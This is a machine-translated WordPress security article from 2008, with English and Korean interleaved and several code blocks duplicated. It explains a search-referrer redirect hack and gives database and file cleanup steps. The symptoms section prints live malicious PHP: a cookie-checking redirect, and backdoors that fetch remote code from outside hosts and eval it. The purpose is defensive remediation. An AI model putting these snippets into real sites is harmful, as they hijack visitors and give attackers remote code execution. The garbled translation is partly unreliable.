WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites WordPress의 해킹 : 픽스 구글과 검색 엔진 또는 귀하 - Needs.info, AnyResults.Net, 골든 - Info.net 및 기타 불법 사이트 트래픽 넘어옴 아니 쿠키 복구

Hackers are going all out to hack and exploit WordPress blogs hosted all over the web, planting and injecting malicious code into WordPress codes and database in order to redirect visitors and hits from Google and other search engines to spam sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us and many other spam sites that filled with pay-per-click CPC ads. 해커들이 해킹을하고 블로그를 이용해 웹상에서 워드, 모든 내용을 호스팅하기 위해서는 귀하 - needs.info 심기와 같은 사이트를 방문한 방문자의 스팸 메일과 구글과 다른 검색 엔진에서 안타를 리디렉션할 WordPress의 코드 및 데이터베이스에 악성 코드를 주입을 모두 가는거야 , anyresults.net, 황금 - info.net, keymachine.de, beliy.us, seogoogle.us와 다른 많은 스팸 사이트를 지불 - 당 - 누릅니다 CPC 광고로 가득합니다. Some hack appears to target bigger crowd by redirecting all without WordPress cookie. 일부 해킹 WordPress의 쿠키로 큰 무리없이 모든 리디렉션 타겟이 나타납니다. Without been hacked, these traffic supposedly to arrive at the blog as destination. 없이, 이러한 트래픽을 가르쳐서 대상으로 블로그에 도착하는 해킹되었습니다.

Symptoms of the Search Engine Redirection Hack 검색 엔진에 리디렉션의 증상이 해킹

Note that not all symptoms may happen altogether. 그 모든 증상이 한꺼번에 일어날 수있습니다. There may be more than one method of hacks existed, which contributed to different finding and possible resolution. 이미 해킹의 다른 가능한 해결 방법을 찾는 방법에 기여 하나 이상의 존재가 될 수있습니다.

• Any click through from search engines such as Google, Yahoo, AOL, MSN, Windows Live search results, including blog name, will be redirected and forwarded to hacker’s sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, with the list sure to grow. 구글, 야후, AOL, MSN과 윈도우 라이브 검색 결과, 블로그 등 검색 엔진을 통해 이름을 클릭 리디렉션됩니다 및 해커의 사이트에서 귀하 - needs.info, anyresults.net 등 전달 황금 - Info를 가. NET, keymachine.de, beliy.us, seogoogle.us, 함께 목록 성장을 확신합니다. Viewer arrives at the hacker page with the same search string that he or she used to search in search engine. 뷰어 해커 페이지에서 동일한 검색 문자열과 그 또는 그녀가 도착하면 검색 엔진에서 검색하는 데 사용합니다.
• Click on a link to the blog on RSS feed reader such as Google reader can be redirected to hacker site too. RSS 피드 리더에 블로그의 링크를 클릭 등 해커 사이트 '구글 리더'너무로 리디렉션할 수있습니다.
• A visitor with no account on the blog, or not login (hence does not has cookie detected by malicious code), will be redirected to spam sites. 블로그, 또는 로그인 안에 계정을 가진 방문자 (금후), 리디렉션됩니다 사이트에 스팸을하지 않은 쿠키를 악성 코드에 의해 감지 않습니다.
• Only visits from search engine are been redirected away, and the trick manage to fool around probably a lot of bloggers, webmasters and site owners, or at least delay the detection of the problem. 검색 엔진에서 불과 방문, 그리고 멀리있다 리디렉션되고 트릭 아마 블로거, 웹마 스터와 웹사이트 소유자가, 아니면 적어도 문제의 감지 지연의 많은 바보짓을 관리할 수있습니다.
• Sudden huge and dramatic drop and lose of massive amount of visitors traffic and page views in web tracker statistics, especially traffic with Google as referrer, even though search engine results ranking is intact. 갑자기 거대하고 극적인 드롭과 방문객의 방대한 트래픽과 웹 추적 통계에 페이지를 조회, 추천으로 특히 구글 트래픽하더라도 검색 엔진의 검색 결과 순위는 그대로입니다 잃게됩니다.
• Massic drop of advertising revenue from Google AdSense or other ads network, or affiliate commissions. Google 애드 센스 또는 다른 광고 네트워크 또는 제휴사위원회에서 광고 수익의 감소 Massic.
• The following base64 encoded PHP code may appear on the wp-blog-header.php file: 다음은 wp를 PHP 코드는 base64로 인코딩된 - 블로그 - header.php 파일 : 나타날 수도있습니다

  <?php \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?> 물어 <?php \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?> seref 심판 달러 ($ <?php \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>

• An image, which is in fact a bunch of malicious PHP code, was added to the wp-contents/uploads directory. 어떤 사실에 악의적인 PHP 코드의 무리입니다 이미지, wp-contents/uploads 디렉토리에 추가했다. For example, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, or it may be inside your theme folder, ie wp-contents/themes/classic/images/xyz.jpg. 예를 들어, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, 또는 당신의 테마 폴더 안에, 즉 wp-contents/themes/classic/images/xyz.jpg 수있습니다. The name of the image may be in the format of xxxxxx_old.jpeg. 이미지의 이름 xxxxxx_old.jpeg의 형식에있을 수있습니다.
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8. 항목에 이미지 rss_f541b3abd05e7962fcab37737f40fad8 일반적으로 플러그인으로 (악의적인 PHP 코드), 워드 wp_options 활성화를 위해 MySQL 데이터베이스에 삽입했다.
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. 또한, 악성 코드,있을 수있습니다, 특히 그 평가 () 또는 base64_decode와 해석 () 기타 WordPress의는 PHP 파일에 삽입된 명령을 실행합니다. Examples are the following codes: 다음 예제 코드입니다 :

  if(isset($_GET['p'])) {
$sock = @fsockopen(’km20725.keymachine.de’, 80);
if($sock){
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
while($content[] = fgets ($sock));
$content = implode(”, $content);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
fclose ($sock);}
} 양말 if(isset($_GET['p'])) {
$sock = @fsockopen(’km20725.keymachine.de’, 80);
if($sock){
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
while($content[] = fgets ($sock));
$content = implode(”, $content);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
fclose ($sock);}
} ($ if(isset($_GET['p'])) {
$sock = @fsockopen(’km20725.keymachine.de’, 80);
if($sock){
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
while($content[] = fgets ($sock));
$content = implode(”, $content);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
fclose ($sock);}
} \ if(isset($_GET['p'])) {
$sock = @fsockopen(’km20725.keymachine.de’, 80);
if($sock){
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
while($content[] = fgets ($sock));
$content = implode(”, $content);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
fclose ($sock);}
}

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
} 만약 if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
}

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
} 만약 if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
}

  eval(gzinflate(base64_decode(

• WordPress theme that is been activated and used can be injected with hacking code and affected too. 그것이 활성화되어 있고 사용하는 코드를 해킹도 영향을 주사 수 WordPress의 테마. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below 이런 코드가 정상적으로 header.php 또는 주제의 index.php에, 존재와 라인은 아래와 유사했다

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some 은 WordPress의 검색 트래픽이 사이트를 해킹 보안 구멍과 그 때 아마 리디렉션 스팸 블로그 소유자 WordPress의 최신 버전으로 업그레이 드하지 않기로 결정으로 인해 취약점이 패치되지 일어나는 (일부는 reports 리포트 that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). 자신의 블로그에 WordPress의 최신 버전 2.5.1의더라도 이미에) 해킹되었습니다. Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages. 원인이 무엇이든간에, 여기를 수정하고 해결책을 해결하고 그 페이지를 다시 Google로 무리한 리디렉션하여 스팸을 처벌하지 않도록되어 트래픽을 소유하고 해킹할 수 있도록 패배.

1. Backup the WordPress database. WordPress 데이타베이스 백업.
2. Use phpMyAdmin to browse WordPress MySQL database tables. phpMyAdmin은 워드를 사용하여 MySQL 데이터베이스 테이블을 탐색할 수있습니다. Go to wp_options table, and then edit the row named active_plugins . wp_options 식탁에 다음 행을 편집라는 active_plugins가. The row details all active plugins that has been activated. 행 세부 운영중인 모든 플러그인 활성화되었습니다. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. 목록 선 ()을 통해, 이동 및 플러그인에 대한보고와 같은 이미지를 확장, 마무리라는는. jpg,.의 jpeg,. gif 및 등 예를 들어, abcdefgh_old.jpeg. Note down the path to the image file. 이미지 파일의 경로를 내려합니다.
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file. sFTP는 또는 SSH를 지원 (FTP 또는 텔넷에 대한 보안을 위해 잊지)를 사용하여 다음 파일의 경로를 탐색하고 파일을 삭제합니다.
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row. WordPress의 관리자 플러그인 패널로 가서, 비활성화 또는 "active_plugins에서"행 악성 플러그인을 치워 어떤 플러그인을 활성화해야합니다.
5. Back to phpMyAdmin , at the wp_options table, find a row that contains the following string as option_name : 위로, wp_options 식탁에서, option_name으로 다음 문자열이 포함된 행을 찾아 phpMyAdmin은 :

   rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away. 멀리 행을 삭제합니다.

   If you don’t know how to perform the database cleanup detailed in steps above, here’sa video tutorial: 만약 데이터베이스를 정리하는 방법에 대한 자세한 위의 단계를 수행해야할지 모르겠다, 여기에 동영상 튜토리얼 :

6. Go to wp_users table. wp_users 테이블로 이동합니다. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00 , note down the user ID ( ID field, a number). 무명의 경우에는 사용자의 사용자 ID 필드 내려 user_nicename에서 (null 값) 0000-00-00 일 00:00:00에 작성하고, 메모 (ID 필드, 숫자)입니다. Delete the user. 사용자가 삭제합니다.
7. Browse the wp_usermeta table. the wp_usermeta 테이블을 찾습니다. Locate all rows with user_id matches the ID of the deleted illegal user. user_id 삭제된 불법 사용자의 ID와 일치하는 모든 행을 찾습니다. There are normally three rows been associated to the invader user ID. 이미 정상적으로 사용자에게 관련되어 3 행이 침력자 ID입니다. Delete all the associated rows. 모든 관련 행을 삭제합니다.
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. 로그인 서버에 테마 파일이나 테마 편집기를 WordPress의 관리자 디자인 패널의 테마 파일 '의 코드를 찾아 수정할 수있습니다. Check the header.php and index.php for any suspicious code. 어떠한 의심스러운 코드에 대한 header.php와 index.php를 확인하십시오. As mentioned above, look for something similar to the line below: 위에서 언급한 바와 같이, 뭔가를 아래와 유사한 줄을 찾습니다 :

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

   If found, delete and remove the code. 만약 발견을 삭제하고 코드를 제거합니다. Note that the malicious code will be several lines long in total. 총 길이는 악성 코드 몇 줄을됩니다.

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. 만약 이미 존재 아니에요, 빈 wp-contents/plugins 디렉토리에 index 파일을 만듭니다. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security. 빈 index.html로 숨깁니다 플러그인 디렉토리의 내용을 효과적으로 플러그 - 해커로부터 단단해지도록하고 WordPress의 보안 강화 기능은 방어막 어떻게 사용되고있다.
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original 업로드 및 각각의 모든 워드 파일을 대체 (단 wp를하지 - 블로그 - header.php)과 함께 서버에서 깨끗한, 신선하고 원래 latest version from WordPress WordPress의 최신 버전 (of course, except few files such as wp-config.php and themes). (물론, wp를 몇 개의 파일 - config.php와 같은 테마를 제외하고). If you’re upgrading, read the 업그레이 드하는 경우, 읽기 guide 가이드 carefully. 조심스럽게.
11. Change your password. 비밀 번호를 변경합니다.
12. If you have multiple users, change theirs password (or ask them to change the password) too. 만약 당신이 그들의 암호를 변경하는 여러 사용자가 (또는 비밀 번호를 변경할 수)도 그들을 요청합니다.

IMPORTANT : This is a machine translated page which is provided "as is" without warranty. 중요 :이 기계는 "보증도없이있는 그대로"제공됩니다 페이지를 번역했다. Machine translation may be difficult to understand. 기계 번역을 이해하기 어려울 수있습니다. Please refer to 을 참조하시기 바랍니다 original English article 원래 영어 문서 whenever possible. 언제든 가능합니다.

Share and contribute or get technical support and help at 공유와 기여하거나 기술 지원과에 도움이 My Digital Life Forums 내 디지털 생활 포럼 .

Related Articles 관련 기사

• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template WordPress의 블로그 페이지에 통합 검색 및 협력을위한 디스플레이 Google 애드 센스 - op의 사용자 정의 검색 엔진 결과 템플릿
• Hack to Search and View Free Live Webcam with Google Search 해킹을 검색하고 무료로 볼 수 살고 웹캠에 구글 검색 기능을 갖춘
• Google Medical Search Engine 의료 검색 엔진 구글
• Wikiasari - Google Co-op Custom Search Engine, Digg or StumbleUpon for Wikipedia? Wikiasari - Google Co - op를 맞춤 검색 엔진, 디그 또는 StumbleUpon 위키 피 디아에 대한?
• Full Set of Google Search Engine Holiday Logo Collection (1998 - 2007) 전체 세트 구글 검색 엔진 로고 홀리데이 컬렉션 (1998 - 2007)
• Replace Google Blog Search with Technorati for Incoming Links in Dashboard of WordPress 바꾸기 Google 블로그 검색 Technorati는 함께 들어오는 링크에 대한 '대시보드'워드의
• StatTraq - Wordpress Plugin for Site Statistic and Traffic Counter StatTraq - WordPress의 플러그인 사이트 통계 및 트래픽 카운터위한
• Create Search Engine for Computer with Copernic Desktop Search Copernic 데스크톱 검색 기능을 갖춘 컴퓨터를위한 검색 엔진을 만들려면
• New Search Engine Wikia Search Launched 새로운 검색 엔진이 위키 검색 출시
• Add and Embed Google Maps, Google Checkout and Google Search to Web Page Easily with WebAssist Dreamweaver Tools for Google 와 embed는 Google Maps, Google Checkout 및 Google 검색 웹 페이지를 쉽게 추가 기능 WebAssist Dreamweaver에서 도구를 사용하여 Google

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under 이 항목은 화요일에, 6 월, 2008 1시 3분에서 10 일 오전 이하 소송을 게시한 Weblogs 웹로그 . . You can follow any responses to this entry through the 당신이이 항목을 통해 어떤 반응을 따를 수있습니다 RSS 2.0 RSS 2.0을 feed. You can 피드.하실 수있습니다 leave a response 응답을 떠나 , or , 또는 trackback 트랙백 from your own site. 자신의 사이트에서.